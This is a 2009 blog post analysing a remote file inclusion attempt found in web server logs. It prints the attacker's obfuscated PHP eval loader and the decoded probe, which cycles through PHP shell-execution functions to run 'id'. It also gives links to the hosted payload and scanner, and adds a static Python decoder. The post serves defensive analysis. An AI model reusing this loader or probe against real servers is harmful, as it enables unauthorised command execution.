1337 v0pCr3w – heh
Posted on 11 May 2009
Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.
It was an attempt to make the Aanval.com primary domain remotely load (include) the following URL:
http://oubkhammuseum.com/templates/idvop.txt
The content of the URL (in the event it gets pulled):
[code lang="php"]$vopcrew = "pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=";
// unwrap the blob (base64 -> rot13 -> raw inflate) and execute whatever comes out
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]
And of course, the decoded PHP version that they would prefer to have executed:
[code lang="php"]$os = @PHP_OS;
echo "v0pCr3w";            // banner the scanner looks for to confirm the include worked
echo "os:$os";
$cmd = "id";
$eseguicmd = ex($cmd);     // run `id` and echo the result back to the scanner
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        // try each command-execution primitive in turn, in case some are disabled
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}[/code]
Essentially, it is an attempt to identify the user the web server process is running as. As you can see, they define the function ex(), which walks a chain of if / elseif tests to try as many avenues as possible for executing the shell command "id" and returning its output.
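A static decoder for this loader chain, as an added example in Python (not code from the original post or from the attacker's tool): it reverses base64, rot13 and raw deflate without evaluating anything, and reports which command-execution primitives the recovered code actually calls. The wrapped input is constructed here from a harmless fragment; the log's own blob is not used, since line-wrapping may have altered it.

```python
import base64
import re
import zlib

# Constructed sample (not the blob from the log): a short PHP fragment wrapped the
# same way the logged loader was, so the decoder below has a known-answer input.
SAMPLE_PHP = '$os = @PHP_OS; echo "os:$os"; $cmd = "id"; echo ex($cmd);'

# The primitives the decoded ex() function cycles through, plus eval itself.
SHELL_PRIMITIVES = ("eval", "exec", "shell_exec", "system", "passthru", "popen")


def rot13_bytes(data: bytes) -> bytes:
    """Equivalent of PHP str_rot13: rotate ASCII letters only, leave every other byte."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:                       # 'A'..'Z'
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:                    # 'a'..'z'
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


def wrap_like_loader(php_source: str) -> str:
    """Forward chain (raw deflate -> rot13 -> base64); used only to build the test input."""
    comp = zlib.compressobj(wbits=-15)          # -15 = raw deflate, what gzinflate() expects
    deflated = comp.compress(php_source.encode()) + comp.flush()
    return base64.b64encode(rot13_bytes(deflated)).decode("ascii")


def unwrap_loader(blob: str) -> str:
    """Reverse the chain statically: the code comes back as text and is never executed."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))   # the logged blob is line-wrapped
    inflated = zlib.decompress(rot13_bytes(raw), wbits=-15)
    return inflated.decode("latin-1")                  # byte-preserving, never raises


def shell_primitives_used(php_source: str) -> list[str]:
    """Which command-execution calls the decoded code invokes (a call, not just the name)."""
    return [f for f in SHELL_PRIMITIVES if re.search(rf"\b{f}\s*\(", php_source)]


if __name__ == "__main__":
    blob = wrap_like_loader(SAMPLE_PHP)
    decoded = unwrap_loader(blob)
    print(decoded)
    print("calls:", shell_primitives_used(decoded))
```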
A quick search around the net turned up the small Perl scanner tool that was used:
http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt
The offending IP apparently belongs to HostMySite, which owns a good-sized net block:
208.112.87.9
OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US
Rather amateurish, but effective. 😉
1 Response to 1337 v0pCr3w – heh
Hi,
I have got the same problem, but does this mean that they have tried to download that file onto my server, or have they verified that it was already on my server?
Regards
Gigi